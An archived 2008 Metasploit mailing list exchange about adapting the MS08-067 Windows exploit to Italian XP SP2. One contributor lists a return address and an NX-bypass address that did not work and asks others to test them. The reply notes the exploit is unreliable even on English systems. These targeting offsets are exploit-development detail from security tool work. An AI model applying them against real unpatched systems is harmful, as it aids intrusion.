Metasploit mailing list archives

MS08-067 added to SVN trunk (3.2-testing)

From: giorgio.casali at gmail.com (Giorgio Casali)
Date: Tue, 28 Oct 2008 12:40:24 +0100

The addressess I've used for a XP SP2 ITA that don't work are:

0x596bf727 ---> Ret
0x596c16e2 --> Disable NX address

It would be great If someone can test them and give a working ones.

Regards

2008/10/28 Rhys Kidd <rhyskidd at gmail.com>:
Hrmm, ok.

Could you just send the two addresses you finally chose for the JUMP ESI and
Disable NX address (not the long list this time) to the msf mailing list to
see if any other Italian locale users can test them, to see if it executes
cleanly.

Its unreliable at the best of time (regardless of the language/service pack
porting). I certainly don't get 100% reliability on English.

With more iterations it can only get better.